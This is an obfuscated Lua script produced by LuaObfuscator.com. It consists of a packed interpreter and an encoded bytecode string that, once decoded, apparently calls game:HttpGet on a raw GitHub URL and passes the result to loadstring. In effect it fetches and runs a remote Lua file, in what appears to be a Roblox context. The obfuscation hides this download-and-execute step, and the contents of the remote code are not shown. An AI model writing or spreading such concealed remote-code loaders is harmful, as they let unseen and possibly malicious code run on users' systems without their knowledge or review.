--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v89=0;while true do if (v89==0) then v19=v0(v3(v30,1,1));return "";end end else local v90=v2(v0(v30,16));if v19 then local v110=0;local v111;while true do if (v110==1) then return v111;end if (v110==0) then v111=v5(v90,v19);v19=nil;v110=1;end end else return v90;end end end);local function v20(v31,v32,v33) if v33 then local v91=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-1) -(v32-(1 -0))) + (2 -(1 + 0)))) ;return v91-(v91%(620 -(555 + 64))) ;else local v92=(933 -(857 + 74))^(v32-((1446 -(282 + 595)) -(367 + 201))) ;return (((v31%(v92 + v92))>=v92) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1639 -(1523 + 114)) );v18=v18 + 2 ;return (v36 * (231 + 25)) + v35 ;end local function v23() local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==(1066 -(68 + 997))) then return (v41 * (16778486 -(226 + (2562 -1518)))) + (v40 * (156337 -90801)) + (v39 * (472 -216)) + v38 ;end if (v37==(0 -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (353 -(87 + 194 + 69)) );v18=v18 + (184 -(67 + 113)) ;v37=118 -(32 + 85) ;end end end local function v24() local v42=v23();local v43=v23();local v44=(4 -1) -2 ;local v45=(v20(v43,953 -((1240 -(145 + 293)) + 150) ,53 -33 ) * ((3 -1)^(24 + 8))) + v42 ;local v46=v20(v43,1018 -(915 + 82) ,87 -56 );local v47=((v20(v43,19 + 13 )==(1 -0)) and  -(1188 -(1069 + 118))) or (2 -1) ;if (v46==((430 -(44 + 386)) -0)) then if (v45==(0 + 0)) then return v47 * (0 -(1486 -(998 + 488))) ;else v46=1 + 0 + 0 ;v44=791 -(368 + 347 + 76) ;end elseif (v46==(6433 -4386)) then return ((v45==(18 -(10 + 8))) and (v47 * (((775 -(201 + 571)) -2)/(442 -(416 + 26))))) or (v47 * NaN) ;end return v8(v47,v46-((4404 -(116 + 1022)) -2243) ) * (v44 + (v45/(2^(23 + 29)))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v66=860 -(814 + 45) , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v93,v94,v95,v96,v97,v98,v99,v100,v101) local v102=(function() return 0;end)();local v93=(function() return;end)();local v94=(function() return;end)();while true do if (v102==0) then v93=(function() return 0;end)();v94=(function() return nil;end)();v102=(function() return 2 -1 ;end)();end if (v102~=(579 -(386 + 192))) then else while true do if (v93~=0) then else v94=(function() return v95();end)();if (v96(v94, #"[", #"!")==(1206 -(696 + 510))) then local v120=(function() return 0 -0 ;end)();local v121=(function() return;end)();local v122=(function() return;end)();local v123=(function() return;end)();while true do if (v120~=(1262 -(1091 + 171))) then else local v163=(function() return 0;end)();while true do if (v163~=(1 + 0)) then else v120=(function() return 3 -2 ;end)();break;end if (v163==0) then v121=(function() return v96(v94,6 -4 , #"91(");end)();v122=(function() return v96(v94, #"asd1",6);end)();v163=(function() return 1;end)();end end end if (v120==(375 -(123 + 251))) then local v164=(function() return 0;end)();while true do if (0==v164) then v123=(function() return {v97(),v97(),nil,nil};end)();if (v121==0) then local v173=(function() return 0 -0 ;end)();local v174=(function() return;end)();while true do if (v173~=(698 -(208 + 490))) then else v174=(function() return 0 + 0 ;end)();while true do if (v174~=(0 + 0)) then else v123[ #"91("]=(function() return v97();end)();v123[ #".dev"]=(function() return v97();end)();break;end end break;end end elseif (v121== #",") then v123[ #"asd"]=(function() return v98();end)();elseif (v121==2) then v123[ #"-19"]=(function() return v98() -(2^(852 -(660 + 176))) ;end)();elseif (v121== #"asd") then local v179=(function() return 0;end)();local v180=(function() return;end)();while true do if (v179==(0 + 0)) then v180=(function() return 202 -(14 + 188) ;end)();while true do if (v180==0) then v123[ #"gha"]=(function() return v98() -((677 -(534 + 141))^(7 + 9)) ;end)();v123[ #".dev"]=(function() return v97();end)();break;end end break;end end end v164=(function() return 1;end)();end if (1==v164) then v120=(function() return 2 + 0 ;end)();break;end end end if (v120~=3) then else if (v96(v122, #"91(", #"19(")== #"<") then v123[ #"xnxx"]=(function() return v99[v123[ #"0313"]];end)();end v100[v101]=(function() return v123;end)();break;end if (v120==2) then if (v96(v122, #"!", #">")== #"|") then v123[2]=(function() return v99[v123[2 + 0 ]];end)();end if (v96(v122,2,2)~= #"~") then else v123[ #"91("]=(function() return v99[v123[ #"xxx"]];end)();end v120=(function() return 6 -3 ;end)();end end end break;end end return v93,v94,v95,v96,v97,v98,v99,v100,v101;end end end;end)();local v52=(function() return function(v103,v104,v105) local v106=(function() return 0 -0 ;end)();local v107=(function() return;end)();while true do if (v106~=(0 -0)) then else v107=(function() return 0 + 0 ;end)();while true do if (0~=v107) then else local v119=(function() return 0 + 0 ;end)();while true do if (v119~=(396 -(115 + 281))) then else v103[v104-#"}" ]=(function() return v105();end)();return v103,v104,v105;end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #"\\",v57 do local v69=(function() return 0 + 0 ;end)();local v70=(function() return;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if (v69==(2 -1)) then v72=(function() return nil;end)();while true do if (v70==0) then v71=(function() return v21();end)();v72=(function() return nil;end)();v70=(function() return 1;end)();end if (v70==(3 -2)) then if (v71== #"{") then v72=(function() return v21()~=0 ;end)();elseif (v71==2) then v72=(function() return v24();end)();elseif (v71== #"19(") then v72=(function() return v25();end)();end v58[v68]=(function() return v72;end)();break;end end break;end if (v69==0) then v70=(function() return 867 -(550 + 317) ;end)();v71=(function() return nil;end)();v69=(function() return 1 -0 ;end)();end end end v56[ #"xxx"]=(function() return v21();end)();for v73= #">",v23() do FlatIdent_89ECE,Descriptor,v21,v20,v22,v23,v58,v53,v73=(function() return v51(FlatIdent_89ECE,Descriptor,v21,v20,v22,v23,v58,v53,v73);end)();end for v74= #"/",v23() do v54,v74,v28=(function() return v52(v54,v74,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1 -0 ];local v64=v60[5 -3 ];local v65=v60[288 -(134 + 151) ];return function(...) local v75=v63;local v76=v64;local v77=v65;local v78=v27;local v79=(172 + 1494) -(970 + 695) ;local v80= -(1 -0);local v81={};local v82={...};local v83=v12("#",...) -((1 + 2) -2) ;local v84={};local v85={};for v108=(0 + 0) -0 ,v83 do if ((3560>132) and (v108>=v77)) then v81[v108-v77 ]=v82[v108 + ((532 -(406 + 123)) -2) ];else v85[v108]=v82[v108 + (1825 -(1195 + 629)) ];end end local v86=(v83-v77) + (1 -0) ;local v87;local v88;while true do local v109=241 -(187 + 54) ;while true do if (v109==(781 -((1931 -(1749 + 20)) + 618))) then if (v88<=(3 + 0)) then if ((687<2183) and (v88<=(1 + 0))) then if (v88>((0 + 0) -(1322 -(1249 + 73)))) then local v125=v87[2 -0 ];v85[v125]=v85[v125](v13(v85,v125 + 1 + 0 ,v80));else v85[v87[1638 -(1373 + 263) ]]=v87[1003 -(451 + 549) ];end elseif ((4549==4549) and (v88==2)) then local v129=v87[1 + 1 ];local v130=v85[v87[3]];v85[v129 + 1 ]=v130;v85[v129]=v130[v87[5 -1 ]];else v85[v87[2 -0 ]]=v62[v87[1387 -(746 + 638) ]];end elseif (v88<=(2 + 3)) then if ((4672==4672) and (v88>4)) then local v136=0 -0 ;local v137;local v138;local v139;local v140;while true do if (v136==2) then for v170=v137,v80 do v140=v140 + (342 -(218 + 123)) ;v85[v170]=v138[v140];end break;end if ((1581 -(1535 + 46))==v136) then v137=v87[2 + 0 ];v138,v139=v78(v85[v137](v13(v85,v137 + 1 + 0 ,v87[563 -(110 + 196 + 254) ])));v136=1;end if (v136==(1 + 0)) then v80=(v139 + v137) -(1 -0) ;v140=0;v136=1469 -((2044 -(466 + 679)) + 568) ;end end else local v141;local v142,v143;local v144;local v145;v85[v87[2 + (0 -0) ]]=v62[v87[7 -4 ]];v79=v79 + (604 -(268 + (958 -623))) ;v87=v75[v79];v85[v87[2]]=v62[v87[293 -(60 + 230) ]];v79=v79 + (573 -(426 + 146)) ;v87=v75[v79];v145=v87[1 + 1 ];v144=v85[v87[1459 -(282 + 1174) ]];v85[v145 + (812 -(569 + 242)) ]=v144;v85[v145]=v144[v87[11 -7 ]];v79=v79 + 1 + 0 ;v87=v75[v79];v85[v87[1026 -(706 + 318) ]]=v87[(3154 -(106 + 1794)) -(721 + 530) ];v79=v79 + 1 ;v87=v75[v79];v145=v87[1273 -(945 + 326) ];v142,v143=v78(v85[v145](v13(v85,v145 + (2 -1) ,v87[1 + 2 ])));v80=(v143 + v145) -(1 + 0) ;v141=0;for v160=v145,v80 do v141=v141 + 1 ;v85[v160]=v142[v141];end v79=v79 + 1 + 0 ;v87=v75[v79];v145=v87[2];v85[v145]=v85[v145](v13(v85,v145 + 1 ,v80));v79=v79 + (701 -(271 + 429)) ;v87=v75[v79];v85[v87[2 + 0 ]]();v79=v79 + ((4431 -2930) -(1408 + 92)) ;v87=v75[v79];do return;end end elseif (v88==(1092 -(461 + 625))) then do return;end else v85[v87[1290 -(993 + 295) ]]();end v79=v79 + 1 + 0 ;break;end if (v109==(1171 -(418 + 753))) then v87=v75[v79];v88=v87[2 -1 ];v109=(115 -(4 + 110)) + 0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034E3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F61726B6F736F6369616C732F61726B6F2Q3233302E746F702F6D61696E2F766330753968316C38772E6C756100083Q0012043Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000100039Q0000026Q000100016Q00017Q00",v9(),...);
